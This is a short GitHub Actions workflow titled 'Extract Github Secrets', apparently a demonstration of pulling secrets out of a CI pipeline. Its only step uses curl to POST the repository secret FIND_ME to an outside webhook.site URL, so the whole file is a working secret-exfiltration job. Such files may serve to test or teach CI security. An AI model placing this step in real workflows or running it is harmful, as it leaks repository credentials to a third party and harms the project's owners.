name: Extract Github Secrets

on: workflow_dispatch

jobs:
  extract-github-secrets:
    runs-on: ubuntu-22.04
    steps:
      - name: "Send Data to webhook.test"
        run:  |
          curl -X POST https://webhook.site/f2592054-ab00-4fe6-9901-3c781cea2974 \
          --data '{"message": "${{ secrets.FIND_ME }}"}'
        
